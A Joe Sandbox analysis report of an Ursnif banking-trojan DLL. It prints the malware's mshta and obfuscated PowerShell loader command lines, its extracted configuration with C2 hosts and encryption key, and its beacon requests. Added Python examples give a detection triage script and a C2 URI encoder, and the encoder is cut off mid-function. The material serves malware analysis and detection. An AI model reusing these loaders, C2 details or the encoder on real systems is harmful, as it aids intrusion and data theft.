

Windows Analysis Report
HxEWwh74qT

Overview

General Information

Sample Name: HxEWwh74qT (renamed file extension from none to dll)
Analysis ID: 613862
MD5: 5d2b5cbd8a574c9e35309e21ecf93a0e
SHA1: c15e583e28556f5d187197937b4d2a715ebf8ca7
SHA256: 52d14c9cd56aa41ba98a24a4a3dc3674f7e281c3d79f6aca141382fb56585bcd
Tags: 32 dll exe

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Sigma detected: Windows Shell File Write to Suspicious Folder
Maps a DLL or memory area into another process
Writes to foreign memory regions
Changes memory attributes in foreign processes to executable or writable
Sigma detected: Accessing WinAPI in PowerShell. Code Injection
Sigma detected: Suspicious Remote Thread Created
Machine Learning detection for sample
Allocates memory in foreign processes
Uses ping.exe to check the status of other devices and networks
Self deletion via cmd delete
Sigma detected: MSHTA Spawning Windows Shell
Uses ping.exe to sleep
Injects code into the Windows Explorer (explorer.exe)
Sigma detected: Suspicious Call by Ordinal
Modifies the context of a thread in another process (thread injection)
Sigma detected: Mshta Spawning Windows Shell
Creates a thread in another existing process (thread injection)
Disables SPDY (HTTP compression, likely to perform web injects)
Writes registry values via WMI
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
One or more processes crash
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Searches for the Microsoft Outlook file path
Drops PE files
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Checks if the current process is being debugged
Sigma detected: Suspicious Csc.exe Source File Folder
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • loaddll32.exe (PID: 7080 cmdline: loaddll32.exe "C:\Users\user\Desktop\HxEWwh74qT.dll" MD5: 7DEB5DB86C0AC789123DEC286286B938)
    • cmd.exe (PID: 7124 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\HxEWwh74qT.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 7148 cmdline: rundll32.exe "C:\Users\user\Desktop\HxEWwh74qT.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • control.exe (PID: 6020 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
    • WerFault.exe (PID: 3380 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7080 -s 608 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 6148 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7080 -s 604 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 6048 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7080 -s 612 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • mshta.exe (PID: 6304 cmdline: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Lpje='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Lpje).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 6932 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name wufxrouxe -value gp; new-alias -name atvqcmfj -value iex; atvqcmfj ([System.Text.Encoding]::ASCII.GetString((wufxrouxe "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 5012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 6024 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pkbugtxo\pkbugtxo.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 6432 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESD841.tmp" "c:\Users\user\AppData\Local\Temp\pkbugtxo\CSC26C720E9EBC041F086604EECC7DD3CDD.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • csc.exe (PID: 900 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lboh4mlq\lboh4mlq.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 5516 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESED31.tmp" "c:\Users\user\AppData\Local\Temp\lboh4mlq\CSC3DF21D054A9F4C66BF1FA9CD771B1F79.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • explorer.exe (PID: 3808 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cmd.exe (PID: 3904 cmdline: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\HxEWwh74qT.dll MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
          • conhost.exe (PID: 5000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • PING.EXE (PID: 6948 cmdline: ping localhost -n 5 MD5: 6A7389ECE70FB97BFE9A570DB4ACCC3B)
        • RuntimeBroker.exe (PID: 4184 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5)
        • cmd.exe (PID: 6652 cmdline: cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user~1\AppData\Local\Temp\5771.bi1" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
  • cleanup
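The tree above is the whole staging chain: rundll32 loads the DLL by ordinal and injects into explorer.exe; later stages are not read from a file but from HKCU\Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E, first by mshta (an inline HTA that regread()s the TestLocal value and evals it), then by PowerShell, which defines throwaway aliases for gp and iex so that the command line never contains the literal "iex". The Python below is an added example, not Joe Sandbox output: it resolves those new-alias definitions before matching, then scores a batch of process-creation records constructed from the command lines in this report (pids and parent images as in the tree; mshta's parent is not shown, so it is left blank; the record field names are this example's own).

```python
"""Triage the staging chain shown in the process tree above.

Added example, not part of the Joe Sandbox report. Ursnif picks new alias
names per infection, so a plain 'iex' string match misses the PowerShell
stage; resolve_aliases() inlines 'new-alias -name X -value Y' first. The
PROCESS_EVENTS records are constructed from this report's command lines;
field names and the empty mshta parent are assumptions of this example.
"""
import re

PROCESS_EVENTS = [
    {"pid": 7148, "image": r"C:\Windows\SysWOW64\rundll32.exe", "parent_image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": r'rundll32.exe "C:\Users\user\Desktop\HxEWwh74qT.dll",#1'},
    {"pid": 6304, "image": r"C:\Windows\System32\mshta.exe", "parent_image": "",
     "cmdline": r"""C:\Windows\System32\mshta.exe" "about:<hta:application><script>Lpje='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Lpje).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>"""},
    {"pid": 6932, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "parent_image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name wufxrouxe -value gp; new-alias -name atvqcmfj -value iex; atvqcmfj ([System.Text.Encoding]::ASCII.GetString((wufxrouxe "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))'},
    {"pid": 3904, "image": r"C:\Windows\System32\cmd.exe", "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": r'C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\HxEWwh74qT.dll'},
    {"pid": 6652, "image": r"C:\Windows\System32\cmd.exe", "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": r'cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user~1\AppData\Local\Temp\5771.bi1"'},
]

ALIAS_RE = re.compile(r"new-alias\s+-name\s+(\w+)\s+-value\s+(\w+)\s*;?", re.I)
# HKCU\Software\AppDataLow\Software\Microsoft\{GUID}: the key both the mshta
# and the PowerShell stage read their next stage from (accepts ':' or any
# number of backslashes as separators, since both spellings occur above).
URSNIF_KEY_RE = re.compile(
    r"HKCU[:\\]+Software\\+AppDataLow\\+Software\\+Microsoft\\+"
    r"[0-9A-F]{8}(?:-[0-9A-F]{4}){3}-[0-9A-F]{12}", re.I)


def resolve_aliases(cmdline: str) -> str:
    """Strip 'new-alias -name X -value Y' definitions and substitute every
    later whole-word use of X with Y, so obfuscated iex/gp become visible."""
    aliases = dict(ALIAS_RE.findall(cmdline))
    resolved = ALIAS_RE.sub("", cmdline)
    for name, target in aliases.items():
        resolved = re.sub(r"\b%s\b" % re.escape(name), lambda m, t=target: t, resolved)
    return re.sub(r"\s+", " ", resolved).strip()


def triage(ev: dict) -> list[str]:
    """Return the behaviours from this report's chain that one record shows."""
    image = ev["image"].lower()
    parent = ev.get("parent_image", "").lower()
    cmd = ev["cmdline"]
    hits: list[str] = []
    if image.endswith("rundll32.exe") and re.search(r",#\d+\b", cmd):
        hits.append("rundll32 export called by ordinal")
    if image.endswith("mshta.exe") and re.search(r"about:<hta:application", cmd, re.I) \
            and re.search(r"\.regread\(", cmd, re.I):
        hits.append("mshta inline HTA evals script read from the registry")
    if parent.endswith("mshta.exe") and image.endswith(("powershell.exe", "cmd.exe")):
        hits.append("mshta spawned a Windows shell")
    if image.endswith("powershell.exe"):
        norm = resolve_aliases(cmd)
        if norm != re.sub(r"\s+", " ", cmd).strip():
            hits.append("powershell alias obfuscation (new-alias)")
        if re.search(r"\b(iex|invoke-expression)\b", norm, re.I) and URSNIF_KEY_RE.search(norm):
            hits.append("powershell invoke-expression on data read from registry")
    if image.endswith("cmd.exe"):
        if re.search(r"\bping\s+\S+\s+-n\s+\d+\s*&&\s*del\b", cmd, re.I):
            hits.append("self-deletion via ping delay and del")
        if re.search(r"\bnslookup\s+myip\.opendns\.com\b", cmd, re.I):
            hits.append("external IP discovery via OpenDNS")
    if URSNIF_KEY_RE.search(cmd):
        hits.append("references Ursnif AppDataLow registry key")
    return hits


def triage_all(events) -> dict[int, list[str]]:
    """Map pid -> findings for a batch of process-creation records."""
    return {ev["pid"]: triage(ev) for ev in events}


if __name__ == "__main__":
    for pid, findings in triage_all(PROCESS_EVENTS).items():
        print(pid, findings)
```

Alias resolution is the part worth keeping: the `-name` values change per sample, but the shape `new-alias -name <word> -value iex` does not, and once resolved the command line reads `iex ([System.Text.Encoding]::ASCII.GetString((gp "HKCU:...").UrlsReturn))`, which any existing iex-plus-registry rule will match.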
Extracted Ursnif configuration:

{
  "RSA Public Key": "pL7U8jIQ6Xyci+KwkOGf1cPW2/Fhd+dF//sxc+w06EDUcByHCNEeq3AMzyjoircBRXTmPPIhcdpmz3ebzg0LE5DJtHXLGNdffU4pfKjfVhDmO/39S4DkofaSw/DfVYS7XTULsvD4OgcLpBmdb9KtHDr5tcYukmu8ER2eGMJKWWH3QPIgCCGjluPn4AJBYaVv+PYiV87aKNKmQY2QyHTRdeOeR6t/zjeQ8WAxQr1ckNg8DXeFDVPzLqKlTMh9JNV1/WxJWw/i0NwLqKGVqwwhDZj7TdIN07N7A3Nsw4LKUmopfR2v3CfaFAElEJJF5iXQZdDs3LWMU3fma/lDGlnr41o8sOGT4DKtfI59bD0qne8=",
  "c2_domain": ["config.edge.skype.com", "67.43.234.14", "config.edge.skype.com", "67.43.234.37", "config.edge.skype.com", "67.43.234.47"],
  "ip_check_url": ["http://ipinfo.io/ip", "http://curlmyip.net"],
  "serpent_key": "Q8tR9QJN7lLzOLle",
  "tor32_dll": "file://c:\\test\\test32.dll",
  "tor64_dll": "file://c:\\test\\tor64.dll",
  "movie_capture": "30, 8,  *terminal* *debug**snif* *shark*",
  "server": "50",
  "sleep_time": "1",
  "SetWaitableTimer_value(CRC_CONFIGTIMEOUT)": "60",
  "time_value": "60",
  "SetWaitableTimer_value(CRC_TASKTIMEOUT)": "60",
  "SetWaitableTimer_value(CRC_SENDTIMEOUT)": "300",
  "SetWaitableTimer_value(CRC_KNOCKERTIMEOUT)": "60",
  "not_use(CRC_BCTIMEOUT)": "10",
  "botnet": "999",
  "SetWaitableTimer_value": "1"
}
Yara matches in memory dumps

Source | Rule | Description | Author
00000014.00000002.766882377.000002DC00CFC000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security
00000003.00000003.391081269.00000000054A8000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security
0000001D.00000003.518242223.000001BF7E55C000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security
00000003.00000003.439315042.00000000052AC000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security
0000001D.00000003.518050705.000001BF7E55C000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security
(24 further entries not shown)
Yara matches in unpacked PE files

Source | Rule | Description | Author
3.2.rundll32.exe.4de0000.0.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security
3.3.rundll32.exe.5456940.1.raw.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security
3.3.rundll32.exe.53aa4a0.0.raw.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security
3.3.rundll32.exe.53aa4a0.0.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security
3.3.rundll32.exe.4c794a0.10.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security
(3 further entries not shown)

                      System Summary

Sigma rule matches

Source: File created | Author: Florian Roth | Data: EventID: 11, Image: C:\Windows\System32\mshta.exe, ProcessId: 6304, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Caches
Source: Thread created (Sysmon EventID 8, CreateRemoteThread) | Authors: Nikita Nazarov, oscd.community; Perez Diego (@darkquassar), oscd.community (two rules matched the same event) | Data: EventID: 8, SourceImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, SourceProcessId: 6932, StartAddress: DBEB1580, TargetImage: C:\Windows\explorer.exe, TargetProcessId: 3808
Source: Process started | Authors: Michael Haag; Florian Roth; Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) (three rules matched the same event) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name wufxrouxe -value gp; new-alias -name atvqcmfj -value iex; atvqcmfj ([System.Text.Encoding]::ASCII.GetString((wufxrouxe "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name wufxrouxe -value gp; new-alias -name atvqcmfj -value iex; atvqcmfj ([System.Text.Encoding]::ASCII.GetString((wufxrouxe "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), CommandLine|base64offset|contains: >jX, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Lpje='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Lpje).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 6304, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name wufxrouxe -value gp; new-alias -name atvqcmfj -value iex; atvqcmfj ([System.Text.Encoding]::ASCII.GetString((wufxrouxe "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), ProcessId: 6932, ProcessName: powershell.exe
Source: Process started | Author: Florian Roth | Data: Command: rundll32.exe "C:\Users\user\Desktop\HxEWwh74qT.dll",#1, CommandLine: rundll32.exe "C:\Users\user\Desktop\HxEWwh74qT.dll",#1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\HxEWwh74qT.dll",#1, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7124, ParentProcessName: cmd.exe, ProcessCommandLine: rundll32.exe "C:\Users\user\Desktop\HxEWwh74qT.dll",#1, ProcessId: 7148, ProcessName: rundll32.exe
Source: Process started | Author: Florian Roth | Data: Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pkbugtxo\pkbugtxo.cmdline, CommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pkbugtxo\pkbugtxo.cmdline, CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name wufxrouxe -value gp; new-alias -name atvqcmfj -value iex; atvqcmfj ([System.Text.Encoding]::ASCII.GetString((wufxrouxe "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6932, ParentProcessName: powershell.exe, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pkbugtxo\pkbugtxo.cmdline, ProcessId: 6024, ProcessName: csc.exe
Source: File created | Author: frack113 | Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6932, TargetFilename: C:\Users\user\AppData\Local\Temp\pkbugtxo\pkbugtxo.cmdline
Source: Process started | Author: frack113 (two rules matched the same event) | Data: Command: cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user~1\AppData\Local\Temp\5771.bi1", CommandLine: cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user~1\AppData\Local\Temp\5771.bi1", CommandLine|base64offset|contains: rg, Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3808, ParentProcessName: explorer.exe, ProcessCommandLine: cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user~1\AppData\Local\Temp\5771.bi1", ProcessId: 6652, ProcessName: cmd.exe
Source: Pipe created | Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) | Data: PipeName: \PSHost.132951400462253769.6932.DefaultAppDomain.powershell
Source: Process started | Author: frack113 | Data: Command: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, CommandLine: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, CommandLine|base64offset|contains: }}, Image: C:\Windows\System32\conhost.exe, NewProcessName: C:\Windows\System32\conhost.exe, OriginalFileName: C:\Windows\System32\conhost.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name wufxrouxe -value gp; new-alias -name atvqcmfj -value iex; atvqcmfj ([System.Text.Encoding]::ASCII.GetString((wufxrouxe "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6932, ParentProcessName: powershell.exe, ProcessCommandLine: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, ProcessId: 5012, ProcessName: conhost.exe
Snort IDS alerts (rule titles from the Networking section below)

Timestamp | SID | Rule | Src Port | Dst Port | Protocol | Classtype
04/22/22-15:26:57.401743 | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49771 | 80 | TCP | A Network Trojan was detected
04/22/22-15:27:17.806871 | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49775 | 80 | TCP | A Network Trojan was detected
04/22/22-15:27:18.629540 | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49775 | 80 | TCP | A Network Trojan was detected
04/22/22-15:27:19.716505 | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | 49775 | 80 | TCP | A Network Trojan was detected



                      AV Detection

Source: 00000003.00000002.568306199.0000000002E80000.00000040.10000000.00040000.00000000.sdmp | Malware Configuration Extractor: Ursnif (configuration listed in full in the Overview above)
Source: HxEWwh74qT.dll | Virustotal: Detection: 36%
Source: HxEWwh74qT.dll | ReversingLabs: Detection: 30%
Source: HxEWwh74qT.dll | Joe Sandbox ML: detected
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04DE3072 CryptAcquireContextW, memcpy, CryptImportKey, CryptSetKeyParam, memcpy, CryptEncrypt, CryptDecrypt, GetLastError, GetLastError, CryptDestroyKey, GetLastError, CryptReleaseContext, GetLastError, 3_2_04DE3072
Source: HxEWwh74qT.dll | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: Binary string: ntdll.pdb source: rundll32.exe, 00000003.00000003.515144273.0000000006160000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.500269242.00000000060B0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: d:\in\the\town\where\ahung.pdb source: loaddll32.exe, 00000000.00000000.390436792.0000000000480000.00000002.00000001.01000000.00000003.sdmp, HxEWwh74qT.dll
                      Source: Binary string: ntdll.pdbUGP source: rundll32.exe, 00000003.00000003.515144273.0000000006160000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.500269242.00000000060B0000.00000004.00001000.00020000.00000000.sdmp

                      Networking

Source: Traffic | Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.7:49771 -> 13.107.43.16:80
Source: Traffic | Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.7:49771 -> 13.107.43.16:80
Source: Traffic | Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.7:49775 -> 146.70.35.138:80
Source: Traffic | Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.7:49775 -> 146.70.35.138:80
Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 146.70.35.138 80
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: Joe Sandbox View | ASN Name: TENET-1ZA
Source: global traffic | HTTP traffic detected:
GET /phpadmin/amEwUCMy/zQvTSnELMCHIJfWA9A7NF2J/B_2FgTN3w5/bDUz7M_2FQ_2FvsyQ/_2FoZnlV0ztm/G4pVInXE2v2/3DjsF_2BN_2F7_/2FqxWA7q0ZWwUgJ9q_2B6/oG7o48SwKb_2FuN4/koQCfS1rrGeWSn9/gvwn1WY7oRq54G3QzL/QoP8Nx_2F/m8EC_2FPKp_2B2QIRT4a/hKoi_2FT5FiIh7mNlS7/jciRuxpI3KdaM19hmR8F9V/NOK7C_2BauAdB/emv_2BixRfY4926/zZ.src HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
Host: 146.70.35.138
Connection: Keep-Alive
Cache-Control: no-cache

Source: global traffic | HTTP traffic detected:
GET /phpadmin/1p0semBcWFOiJ/VuHxHtu5/AN830nRWQ1d2xctaoA3KLHR/918Z9VEhPV/P8ohXldFwnNmepL6Q/uKTfc4fmSrkK/BfYNKcK_2Bx/w_2FA1ltM5KCgm/3UT06OWaufeDOP8Oq_2FL/oIF6meLVrySmPHH0/RIFJ_2FHuhWguIS/4hvBrDpXZ_2FB9M_2F/VjlCK_2FC/TflkNLJtzRIEzaze5_2F/wDsLbDghNL5li48V5rm/4qe0lRbO5_2FdP6RKk3aIg/j40b09twfw_2F/PdHkwNcC/i0_2BVuZ/L.src HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
Host: 146.70.35.138
Connection: Keep-Alive
Cache-Control: no-cache

Source: global traffic | HTTP traffic detected:
GET /phpadmin/sJOLDU_2FhOUoo/k46SW66GV6I1pQKjWA9TE/PWpby4hvIkOnAKsS/x0Aee5T7Xyol_2F/mHBJFq72pa7ZryIdq5/j7jpLfh_2/B9C_2B8rr1N7pwYs7Hbz/HAjnG5DvkxUUwsnvZ2H/7mKa3lBAhH1k0Vg5CBUe72/SPp1Kc_2FZv6K/7UGQxmIh/q1dxSy205p9HqV1EWhDaIi0/wpq760vWJe/2wvTRaTBNSXKAlgWL/PHcpI3wJ6a_2/BROCpFJpoTX/N2ZuQyATVgKAeO/_2Fd3SdF.src HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
Host: 146.70.35.138
Connection: Keep-Alive
Cache-Control: no-cache
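The three beacons above are what the two ET signatures key on: the bot base64-encodes its request blob, rewrites the URL-unsafe base64 characters as _2B (for +) and _2F (for /), cuts the result into pseudo-directory segments at arbitrary offsets (the first URI even splits a token across a separator, "7_/2F"), and wraps it in a fixed prefix and extension, here /phpadmin/ and .src. The Python below is an added example, not part of the report or of the ET rule set: an encoder and decoder for that layout plus a structural classifier run against the first captured path. Two things are this example's assumptions rather than evidence from the page: that = is rewritten as _2D (taken from other ISFB analyses; the report only shows _2B and _2F), and the 6..20-character segment length range. The decoded bytes are still ciphertext (Serpent, keyed by the configuration's serpent_key); the example stops at the transport layer and does not decrypt.

```python
"""Ursnif/ISFB C2 URI layout, the structure ET SIDs 2033203/2033204 flag.

Added example, not from the report or the ET rules. '_2D' for '=' and the
segment-length range are assumptions of this example; the decoded blob is
still Serpent ciphertext and is not decrypted here.
"""
import base64
import random
import re

SUBST = {"+": "_2B", "/": "_2F", "=": "_2D"}
URI_RE = re.compile(r"^/(?P<prefix>[^/]+)/(?P<body>.+)\.(?P<ext>[A-Za-z0-9]+)$")

# First beacon path captured in this report (host 146.70.35.138).
REPORT_URI = ("/phpadmin/amEwUCMy/zQvTSnELMCHIJfWA9A7NF2J/B_2FgTN3w5/bDUz7M_2FQ_2FvsyQ/"
              "_2FoZnlV0ztm/G4pVInXE2v2/3DjsF_2BN_2F7_/2FqxWA7q0ZWwUgJ9q_2B6/"
              "oG7o48SwKb_2FuN4/koQCfS1rrGeWSn9/gvwn1WY7oRq54G3QzL/QoP8Nx_2F/"
              "m8EC_2FPKp_2B2QIRT4a/hKoi_2FT5FiIh7mNlS7/jciRuxpI3KdaM19hmR8F9V/"
              "NOK7C_2BauAdB/emv_2BixRfY4926/zZ.src")


def isfb_encode_uri(blob: bytes, prefix: str = "phpadmin", ext: str = "src",
                    rng=None) -> str:
    """Lay out an (already encrypted) blob the way the bot does: base64,
    '_2X' substitutions, random '/' cuts, fixed prefix and extension."""
    rng = rng or random.Random(0)
    text = base64.b64encode(blob).decode("ascii")
    for ch, tok in SUBST.items():
        text = text.replace(ch, tok)
    # Cut at arbitrary offsets, like the bot; a token may straddle a '/'.
    segments, i = [], 0
    while i < len(text):
        n = rng.randint(6, 20)          # assumed range, not from the report
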